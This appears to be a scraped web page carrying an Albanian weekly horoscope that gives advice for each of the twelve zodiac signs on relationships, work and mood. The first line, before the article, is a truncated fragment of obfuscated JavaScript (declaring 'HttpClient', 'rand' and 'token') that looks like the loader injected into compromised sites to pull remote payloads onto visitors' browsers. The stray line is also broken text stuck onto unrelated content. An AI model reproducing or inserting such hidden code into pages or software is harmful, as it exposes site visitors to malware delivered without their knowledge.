;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Horoskopi: Zbuloni se çfarë fshehin yjet për ju këtë javë

By

Është një javë e re, një fillim i ri. I gjithë qëllimi është t’ja nisim javës gjithë energji. Pra, kur të filloni një udhëtim të ri, zbuloni se çfarë kanë në dispozicion yjet për ju.

Ka dymbëdhjetë shenja të zodiakut dhe secili ka veçoritë e tij të dallueshme. Qoftë Dash, Dem, Binjak, Gaforre, Luan, Virgjëreshë, Peshore,  Akrep, Shigjetar, Bricjap, Ujor apo Peshk – secili prej shenjave ka diçka unike për të treguar:

Dashi

Këtë javë do të hasni në keqkuptime shumicën e kohës. Ju keni një personalitet të fortë dhe ndjeni nevojën se duhet të mbani qëndrimin tuaj në çështjet e caktuara. Por kjo nuk do të funksionojë këtë javë! Këto kohë një harmoni paqësore me të tjerët është çka ju nevojitet për të kultivuar harmoni të brendshme. Mos shkoni aty ku ka konflikt sepse keni gjëra më të rëndësishme për të bërë. Mund të përfshiheni në gjëra me interes për ju dhe ato që keni pasion.

Demi

Këtë javë mendoni më shumë për qëllimin tuaj në jetë dhe mundësitë se si mund ta arrini atë. Gjatë reflektimit do të gjeni më shumë paqe me veten dhe rrethanat tuaja, e kjo është pikërisht ajo që ju duhet. Këtë jave ndoshta do të zgjidhni edhe një tjetër konflikt në jetën tuaj personale. Mirëpo kjo nuk do të thotë që problemet tuaja do të zgjidhen si me magji, por do të gjeni një mënyrë më ndryshe për të komunikuar me këtë person.

Binjakët

Nëse nuk jeni afër fizikisht me një person të caktuar kjo nuk do të thotë që ju nuk mund të komunikoni dhe ta ndjeni atë person edhe më afër, më mënyra tjera komunikimi. Këtë javë shfrytëzoni që të flisni me persona që ju mungojnë, dikë që nuk ke parë që një kohë të gjatë dhe dikë që keni ftohur raportet. Bëhu kreativ në mënyrën e komunikimit! Këtë javë merreni më qetë, reflektoni me veten, shprehni dashurinë dhe mirënjohjen tuaj ndaj personave më të dashur.

Gaforrja

Nëse po ndjeheni të stresuar, të mërzitur apo vetëm, vizitat tek një terapist nuk janë mënyra e vetme se si të ballafaqoheni me këto ndjenja. Nëse vëreni veten se po largoheni nga njerëzit më të afërt dhe keni mendime negative, mendoni të ndihmoni veten. Shkruajini të gjitha mendimet negative dhe bekimet që ke në jetë në një letër. Tregohuni i sinqertë teksa i hidhni në letër. Komunikoni me një person që duket se ka aftësinë të ju bëjë të ndiheni mirë dhe ju bën të buzëqesh. Ju mund të ndihmoni veten, vetëm në momentin që tregoheni të sinqertë dhe flisni hapur për çka do që po kalon.

Luani

Dikush në jetën tuaj nuk po ju atë që ju duhet juve në aspektin emocional. Ky person nuk po ju ofron atë lidhje që ju dëshironi dhe që shpresoni ta keni. Por ndoshta kjo po ndodh se ju nuk po komunikoni atë që ju dëshironi. Këtë javë thuaje dhe kërkoje atë që do dhe do shihni që ky person do ju kuptojë plotësisht. Bëhu më i vëmendshëm në punën apo detyrën që po bëni, sepse do të mësoni diçka që do të ju duhet shumë në të ardhmen.

Virgjëresha

Shumë shpesh ju mbani opinionet tuaja për vete ose nuk zbuloni veten plotësisht. Mirëpo kjo ka potencialin të ju bëjë më të mbyllur si person, dhe ju nuk duhet të ndjeheni asnjëherë si hije! Është koha që të ndryshoni këto zakone dhe të shihni sa produktive do të jenë për ju. Po ashtu kjo javë është e mrekullueshme që ju të filloni atë gjë që keni lënë anash që sa kohë. Kur t’ia filloni do gjeni veten rrugës, dhe ky ‘projekt’ mund të luajë një rol shumë të rëndësishëm në jetën tuaj në të ardhmen.

Peshorja

Mos flisni për ide madhore dhe të komplikuara edhe nëse besoni në ato, të paktën për një kohë. Mund të jeni subjekt i kritikave për të cilat ju mund të mos jeni gati. Këtë javë punoni në idetë tuaja që t’i rafinoni dhe t’i qartësoni. Kur të vie koha që t’i zbuloni ju do të jeni të sigurt dhe të gatshëm plotësisht. Jepni vetes pak kohë të lirë që të relaksoheni me një libër, film apo duke dëgjuar muzikën që preferoni.

Akrepi

Që në fillim të kësaj jave po ndjeheni i lodhur dhe i rraskapitur. Po a është kjo mënyra e zakonshme si i qaseni jetës suaj? Është në dorën tuaj si t’i qaseni rrethanave tuaja. Ju keni fuqinë për ndërruar mënyrën se si mendoni për jetën dhe të ardhmen tuaj, dhe këto mendime negative nuk po ju bëjnë kurrfarë nderi. Filloni të ndërtoni pak entuziazëm në jetën tuaj sepse negativiteti do të qëndrojë si barrierë mes jush dhe atë që dëshironi ta keni në jetë. Nëse besoni mjaftueshëm në atë që ëndërroni universi do ju ngrejë drejt asaj. Pak punë, pak buzëqeshje dhe pak humor do ju qojnë larg në jetë.

Shigjetari

Po keni vështirësi të mendoni për planet për të nesërmen e lërë më për të ardhmen. Por duhet ta keni parasysh se kjo situatë është e përkohshme dhe nuk duhet të pauzoni në jetën tuaj. Mundësi të reja do ju vijnë së shpejti dhe shqyrtojini ashtu siç do të kishit bërë zakonisht. Ajo që po kaloni në këtë momente nuk duhet të definojë të ardhmen tuaj dhe të hiqni dorë nga puna. Nuk është nevoja as të nguteni, thjesht merreni çdo ditë me qetësi duke mos futur shumë probleme në formulën me të cilën analizoni situatat.

Bricjapi

Një përmisim i papritur në këtë situatë të vështirë që lidhet me shtëpinë apo financat, mund të ndodh këtë javë. Ose paktën gjërat do fillojnë të marrin një kahe më pozitive. Mos lejo askënd që të ju mbush me dyshime. Keni çdo arsye për të shpresuar që diçka do të rezultojë pozitivisht në fund. Detyra që po kryeni, projekti që keni nisur apo puna që po bëni mund të jetë e vështirë ndonjëherë po me shumë përkushtim do ja dilni mbanë. Njerëz të caktuar do ju përqeshin për ‘dështime’, po ai që nuk provon kurrë nuk ka se si të dështojë. Ai që nuk heq dorë ja del mbanë. Javë të këndshme Bricjap, sepse e meritoni.

Ujori

Ju po konsideroni të filloni një biznes ose një nismë që sjell para me dikë shumë të afërt në jetën tuaj. Mund të jetë një shok, një familjar, një partner. Të qenurit praktik dhe logjik, ju e keni parasysh që përzierja e punës me dikë të afërt, jo gjithnjë rezulton mirë në fund. Por nëse i qaseni si duhet mund të jetë e mrekullueshme. Këtë javë analizoni të gjitha mundësitë dhe pengesat me personin tjetër. Radhitni pritshmëritë tuaja por dëgjoni me kujdes edhe ato të plas tjetër. Nëse definoni rolet si duhet nuk ka asnjë arsye që të mos hyni bashkë në këtë rrugëtim.

Peshqit

Mirëprisni këshillat nga personat kompetent sepse kështu ju do arrini të qëndroni në rrugën e duhur. Dikush do ju kërkojë një nder të madh këtë javë. Ndoshta ky person do të ngurojë të ju kërkojë ndihmë, duke marrë parasysh obligimet që keni. Mirëpo duke i bërë këtë favor këtij personi, do të rezultojë të jetë shumë frytdhënëse edhe për ju.

Artikuj të ngjashëm